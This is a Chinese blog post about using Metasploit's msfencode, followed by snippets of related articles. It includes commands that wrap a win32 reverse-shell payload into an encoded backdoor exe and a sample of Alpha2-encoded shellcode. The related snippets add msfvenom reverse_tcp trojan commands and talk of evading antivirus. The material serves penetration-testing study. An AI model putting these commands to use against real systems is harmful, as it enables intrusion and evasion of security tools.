msfencode的基本使用

最新推荐文章于 2024-08-02 10:54:44 发布
最新推荐文章于 2024-08-02 10:54:44 发布
阅读量1.7k 收藏
点赞数
分类专栏: 苦行僧之路 实践 文章标签: msfencode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dalerkd/article/details/75805320
版权

简单介绍一下msfencode的使用。

msfencode -t exe -c 5 > /root/Desktop/door.exe

msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 10 -o Temp17.exe -i

上面有raw参数,那什么是RAW数据?Payload生成了一什么样的数据格式?
RAW数据就是汇编Payload数据

msfencode使用关键

大多数文章中描绘了将msfpayload生成的原始数据传输给msfencode.即:

./msfpayload win32_reverser LHOST 本机IP R | msfencode -e ShiKata_ga_nai -t exe > 输出路径

那么通过”|”即管道符传递的到底是什么呢?
答案是ShellCode的16进制.

msfencode -h是帮助.比较清晰

生成一个先

用16进制编辑器写任意一段汇编放在一个文件中,我用cc.cc.

root@kali:/usr/share/framework2# ./msfencode -e Alpha2 -i cc.cc
[*] Using Msf::Encoder::Alpha2 with final size of 102 bytes
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x43".
"\x58\x50\x30\x41\x31\x42\x41\x6b\x42\x41\x53\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6d\x39\x58\x4c\x48".
"\x4c\x5a\x6c\x7a\x6c\x78\x4c\x4a\x6c\x68\x4c\x38\x4c\x4a\x6c\x58".
"\x4c\x78\x4c\x38\x4c\x58\x4c\x38\x4c\x4a\x6c\x5a\x6c\x7a\x6c\x48".
"\x4c\x68\x4c\x6a\x6c\x43";

666,可以再试试别的模块.

模块众多

有九款编码器,666,我看到一款就震惊了.
看一下它们的模块
Alpha2 异或和跳转判断,简直完美
Countdown

模板文件的使用

通过参数,你可以直接将ShellCode编码到模板exe中.
-d 指定 exe模板搜索路径,
-k 设置生成的文件运行后的payload进程与模板文件进程分离。

Metasploit 教程 —– msfpayload 和 msfencode
Metatsploit学习笔记

dalerkd
关注
专栏目录
Msfconsole详细教程
weixin_65582330的博客
03-05 3867
Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。选择架构平台:x86 | x64 | x86_64Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe。
Metasploit(五)--Msfencode命令
weixin_33814685的博客
08-28 184
说了msfpayload,自然就到了msfencode,不管别的,很多生成后门的命令就要用这两条。。。root@bt:/opt/metasploit/msf3#msfencode-h Usage:/opt/metasploit/msf3/msfencode<options> OPTIONS: -a<opt>Th...
【网络安全】木马免杀方式——加壳免杀
最新发布
weixin_42340783的博客
08-02 1864
免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。
MetaSploit的msfencode程序
LLC
08-06 1556
http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass 看到这篇帖子,你一定觉得msfencode如此神奇,居然直接秒菜杀软。 看到他的魅力了,我也想玩弄下,于是最近2天就在整BackTrack,没怎么接触过Linux的我在朋友的帮助,终于把环境弄好了,然后给自己的程序加密,结果让人难以接受,加密300KB的
Msfvenom的简单用法
热门推荐
Shanfenglan's blog
11-04 7万+
CATALOG1.常见高级参数2.常用生成载荷命令2.1 生成linux系统反向shell载荷2.2 生成windows系统载荷2.3 生成web类型载荷2.4 生成语言类载荷 1.常见高级参数 参数字段 效果 set PrependMigrate true 启用迁移进程(默认为:false) set PrependMigrateProc explorer.exe 迁移到此进程名:explorer.exe set SessionExpirationTimeout 0 会话超时时间0秒
msfvenom的简单使用
jeff_true的博客
01-14 658
1,msfvenom -l | grep windows | grep x64 | grep tcp 2,msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.19.91.10 LPORT=4444 -f exe > shell.exe 将此exe文件传到目标靶机上(windows x64) 3,msfconsole use exploit/...
msfvenom 简单利用记录
sinat_41380394的博客
08-05 480
msfvenom常用参数大概就是-p (payload) ,-e(encoder),-i(encoder次数),-o(输出路径),-f(输出文件类型)。   简单生成一个反弹tcp的exe文件,使用编码方式是xor: msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.120 LPORT=4444 -e xor -...
Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)
weixin_46035615的博客
04-14 4816
1.Metasploit 渗透测试框架介绍 2.Metasploitable2-Linux 靶机系统介绍 3.Metasploit 基本使用方法 4.实战-使用 msf 渗透攻击 Win7 主机并远程执行命令 5.实战-使用 msf 扫描靶机上 mysql 服务的空密码
渗透测试神器——Metasploit Framerwork使用
PICACHU+++的博客
02-19 4135
一、介绍 Metasploit Framework是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。 二、基本使用 1.信息收集 db_nmap /nmap -T [0-5]:默认为T3,T4表示最大TCP扫描延迟为10ms -sS:TCP SYN扫描,半开扫描 -sA:TCP ACK扫描 -sT:TCP扫描
Metasploit框架详解:使用与模块解析
"本文档介绍了metasploit框架的基础知识,包括其使用介绍、架构组成、主要模块以及交互接口。" Metasploit是一个广泛使用的开源安全工具,主要用于安全漏洞检测和渗透测试。它提供了多种功能,使得安全研究人员和...
msf使用方法
06-29
### MSF基本操作 #### 启动MSF Web界面 通过`svn update ./msfweb`更新MSF Web界面,然后运行`./msfweb`,默认在本地地址`127.0.0.1`的`55555`端口启动Web界面。 #### 打开MSF控制台 执行`./msfconsole`命令,...
MSF渗透框架简介及使用
afei001
03-23 1017
Metasploit简介     Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。     Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D.Moore在2003年发...
msfvenom生成木马的简单利用
dodod2012的专栏
07-15 4726
1、简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。 2、实验环境 1、一台kali虚拟机 ip为192.168.110.140 2、一台win10虚拟机 3、实验步骤 1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport.
Msfvenom的使用
Beret-81的博客
03-12 1167
目录1、初识 Msfvenom2、Msfvenom 使用3、Msfvenom 例子Msfvenom 生成 elf 文件4、Msfvenom 生成各种 Payload 1、初识 Msfvenom Msfvenom是Metasploit独立的有效载荷生成器,也可以替代msfpayload和msfencode。 2、Msfvenom 使用 语法: Msfvenom -p lhost= lpor...
Metasploit教程:msfpayload和msfencode
10-07 1568
网上说用msfpayload 生成什么注入进程什么攻击后门,后边的注入进程是吓唬人的,就是一种进程隐藏技术不理解没关系(解释一下:进程注入是指将可恶意的可执行代码注入到一个已经运行的进程一般是合法系统进程,达到来隐藏自身的目的。     msfpayload 这个工具主要的功能就是将Metasploit 中的payloads(工具载荷)包装成一个可执行的文件,或者包装成指定的类型,msfpayl
Metasploit 教程 ----- msfpayload 和 msfencode
weixin_33682719的博客
07-28 273
网上说用msfpayload 生成什么注入进程什么***后门,后边的注入进程是吓唬人的,就是一种进程隐藏技术不理解没关系(解释一下:进程注入是指将可恶意的可执行代码注入到一个已经运行的进程一般是合法系统进程,达到来隐藏自身的目的。 msfpayload 这个工具主要的功能就是将Metasploit 中的 payloads(工具载荷)包装成一个可执行的文件,或者包...
msf payload php,msfpayload和msfencode的介绍_91Ri.org
weixin_32023449的博客
03-11 463
网上说用msfpayload 生成什么注入进程什么攻击后门,后边的注入进程是吓唬人的,就是一种进程隐藏技术不理解没关系(解释一下:进程注入是指将可恶意的可执行代码注入到一个已经运行的进程一般是合法系统进程,达到来隐藏自身的目的。msfpayload 这个工具主要的功能就是将Metasploit 中的 payloads(工具载荷)包装成一个可执行的文件,或者包装成指定的类型,msfpayload可以...
MSFconsole进阶】Encoders(编码器模块):编码器、使用方法
05-24 1551
【渗透工具】MSFconsole进阶:Encoders(编码器模块)
Msfvenom生成后门及运用
快吃小蛋糕吧的博客
10-01 4991
title: Msfvenom生成后门及运用 date: 2020-10-01 15:34:16 tags: [Metasploit,Backdoor] categories: 网络安全 Msfvenom生成后门及运用 本篇文章将会使用msfvenom来创建木马,然后通过msfconsole中的expoit/multi/handler来反弹靶机shell。 后门的生成: 首先通过各种操作系统,脚本语言来生成后门: 常用参数说明: e 编码方式 i 编码次数 b 在生成的程序中避免出.
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值